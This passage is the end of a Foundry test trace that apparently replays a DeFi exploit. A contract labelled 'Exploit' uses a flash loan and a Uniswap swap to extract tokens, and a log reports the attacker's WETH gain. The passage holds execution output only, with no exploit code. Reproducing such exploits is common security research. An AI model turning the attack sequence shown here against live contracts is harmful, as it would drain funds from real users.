    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0x0000000000000000000000000000000000000000000000003639be96826ebd21 → 0x0000000000000000000000000000000000000000000000000541db27e2305170
    │   │   │   │   │   @ 0xe100440dfc2dbe147e3cf35e4fa6edfac3a7aa3ac0ab3526fe551ded77e37432: 0x000000000000000000000000000000000000000000000000b61c27a9ecfbbb1b → 0x000000000000000000000000000000000000000000000000e7140b188d3a26cc
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000003639be96826ebd21 → 0x0000000000000000000000000000000000000000000000000541db27e2305170
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [54512] 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759::swap(0, 7560087519329645008552 [7.56e21], Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [41210] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7560087519329645008552 [7.56e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 7560087519329645008552 [7.56e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000199d54a57c51b9896a8
    │   │   │   │   │   │   @ 14: 1079 → 1080
    │   │   │   │   │   │   @ 0xfe3385f329839403389db46b4ce3376c324c5ebe79f7c42b19a7b5f2778c439c: 0x0000000000000000000000000000000000000000000007928ff1be5117204387 → 0x0000000000000000000000000000000000000000000005f8baa7668bfb87acdf
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   │   └─ ← [Return] 16650945922372085452 [1.665e19]
    │   │   │   │   ├─ [661] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   │   └─ ← [Return] 28200074776191766605023 [2.82e22]
    │   │   │   │   ├─ emit Sync(reserve0: 16650945922372085452 [1.665e19], reserve1: 28200074776191766605023 [2.82e22])
    │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 3528538897342426033 [3.528e18], amount1In: 0, amount0Out: 0, amount1Out: 7560087519329645008552 [7.56e21], to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x660c76bb0000000007928ff1be5117204387000000000000b61c27a9ecfbbb1b → 0x660c76bb0000000005f8baa7668bfb87acdf000000000000e7140b188d3a26cc
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [3528538897342426033 [3.528e18], 7560087519329645008552 [7.56e21]]
    │   │   ├─ [6548] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::transfer(0xaA6f337f16E6658d9c9599c967D3126051b6c726, 7560087519329645008552 [7.56e21])
    │   │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xaA6f337f16E6658d9c9599c967D3126051b6c726, value: 7560087519329645008552 [7.56e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000199d54a57c51b9896a8 → 0
    │   │   │   │   @ 0xa956d0613891519c13a3326694b8eee311998029c3155840f12440ed005e9b1d: 0 → 0x000000000000000000000000000000000000000000000199d54a57c51b9896a8
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x91af4d40cd4ad418c448c3718356e1e15e88a9c9d7db3e892e03c647c04bb124: 0x0000000000000000000000000000000000000000000000d8d726b7177a800000 → 0x0000000000000000000000000000000000000000000000e40e772ce3b26cca00
    │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0 → 0x0000000000000000000000000000000000000000000000e40e772ce376d20000
    │   │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0x0000000000000000000000000000000000000000000000003639be96826ebd21
    │   │   │   @ 12: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xaA6f337f16E6658d9c9599c967D3126051b6c726) [staticcall]
    │   │   └─ ← [Return] 2033386879915592850 [2.033e18]
    │   ├─ [661] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::balanceOf(0xaA6f337f16E6658d9c9599c967D3126051b6c726) [staticcall]
    │   │   └─ ← [Return] 7560087519329645008552 [7.56e21]
    │   ├─ emit Flash(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 7485235167653113869853 [7.485e21], param4: 0, param5: 74852351676531138699 [7.485e19])
    │   ├─  storage changes:
    │   │   @ 2: 0x000000000000000000000000000000001c8b479e3ee0ea71fbc86f2fd6f0652c → 0x000000000000000000000000000000012cd31930b1ae6eea046d75c44fc722cc
    │   └─ ← [Stop]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 378824808020857200 [3.788e17]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WETH after exploit", val: 378824808020857200 [3.788e17], decimals: 18)
    ├─  storage changes:
    │   @ 0: 0x0000000001000100000115540000000000000022cd229c8cf71613aa1a1dfebb → 0x0001000001000100000115540000000000000022cd229c8cf71613aa1a1dfebb
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 20.95s (17.50s CPU time)

Ran 2 test suites in 21.02s (23.67s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
